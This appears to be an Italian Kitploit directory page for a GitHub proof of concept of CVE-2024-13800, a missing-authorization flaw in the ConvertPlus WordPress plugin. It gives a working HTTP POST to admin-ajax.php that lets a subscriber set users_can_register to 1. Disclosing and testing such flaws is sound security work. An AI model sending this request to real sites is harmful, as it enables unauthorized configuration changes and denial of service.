Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-13800 — Plugin Popup per WordPress - ConvertPlus <= 3.5.30 - Mancanza di Autorizzazione per Aggiornamento Limitato delle Opzioni per Utenti Autenticati (Subscriber+) | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/cve-2024-13800
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration TestingConfigurazione Errata
GitHubrandomrobbiebf/cve-2024-13800

CVE-2024-13800

Plugin Popup per WordPress - ConvertPlus <= 3.5.30 - Mancanza di Autorizzazione per Aggiornamento Limitato delle Opzioni per Utenti Autenticati (Subscriber+)

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-13800

Plugin Popup per WordPress - ConvertPlus <= 3.5.30 - Autorizzazione Mancante per Aggiornamento Limitato delle Opzioni per Autenticati (Subscriber+)

Descrizione

Il plugin ConvertPlus per WordPress è vulnerabile a modifiche non autorizzate dei dati che possono portare a un denial of service a causa della mancanza di un controllo delle capacità sull'endpoint AJAX 'cp_dismiss_notice' in tutte le versioni fino alla 3.5.30 inclusa. Ciò consente a utenti autenticati, con accesso di livello Subscriber o superiore, di aggiornare i valori delle opzioni a '1' sul sito WordPress. Questo può essere sfruttato per aggiornare un'opzione che creerebbe un errore sul sito e negherebbe il servizio agli utenti legittimi, o per impostare alcuni valori a true, come la registrazione.

Dettagli

  • Tipo: plugin
  • Slug: convertplug
  • Versione Affetta: 3.5.30
  • Punteggio CVSS: 8.1
  • Classificazione CVSS: Alta
  • Vettore CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H
  • CVE: CVE-2024-13800
  • Stato: Privato

Note

Inserisce solo un 1 nel database, quindi puoi solo impostare un 1 in users_can_register

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal:5555
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://kubernetes.docker.internal:5555
Connection: keep-alive
Referer: http://kubernetes.docker.internal:5555/wp-admin/options-general.php
Cookie: wordpress_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7C8cb19a315a9569e77d5be2bf7555f178a9edba2afbc32d1499b8cfd5552e28b9; wp-settings-1=product_cat_tab%3Dpop%26libraryContent%3Dbrowse; wp-settings-time-1=1742893819; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_c4ed56a3aa31dfaae2a50e9003068198=superadmin%7C1746784004%7CMdf7LiwOfluHufzihPiyUftZsNV1BU1vziFSwkdD7gT%7Cf4d35f828e20c240ecf95e5940bddf55741adc8048977e60afd45a178c003011

action=cp_dismiss_notice&notice=users_can_register
Scarica lo strumento